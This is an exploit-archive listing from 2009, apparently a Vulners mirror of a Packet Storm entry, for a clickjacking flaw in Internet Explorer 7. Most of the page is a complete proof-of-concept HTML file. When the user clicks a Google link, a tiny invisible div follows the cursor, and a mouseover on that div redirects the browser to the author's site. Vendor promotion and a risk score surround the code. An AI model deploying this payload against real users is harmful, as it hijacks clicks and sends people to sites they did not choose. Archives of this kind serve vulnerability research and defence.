Lucene search
K

Internet Explorer 7 ClickJack

🗓️ 29 Jan 2009 00:00:00Reported by UzmiXType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 25 Views

İnternet Explorer 7 Clickjacking vulnerability allows remote attackers to hijack user clicks leading to a malicious websit

Code
`#############################################################  
# Application Name : İnternet Explorer 7  
# Vulnerable Type : Clickjacking  
# Author : UzmiX  
#############################################################  
< ------------------- header data end of ------------------- >  
<html>  
<body>  
<div id="open"  
onmouseover="document.location='http://www.uzmix.net';"  
style="position:absolute;width:8px;height:7px;background:#FFFFFF;border:1px"></div>  
<script>  
function updatebox(evt) {  
mouseX=evt.pageX?evt.pageX:evt.clientX;  
mouseY=evt.pageY?evt.pageY:evt.clientY;  
document.getElementById('open').style.left=mouseX-2;  
document.getElementById('open').style.top=mouseY-2;  
}  
</script>  
<center>  
<br>  
<br>  
<a href="http://www.google.com" onclick="updatebox(event)"><font  
style="font-family:arial;font-size:32px">http://www.google.com</font></a>  
</html>  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

29 Jan 2009 00:00Current
7.4High risk
Vulners AI Score7.4
25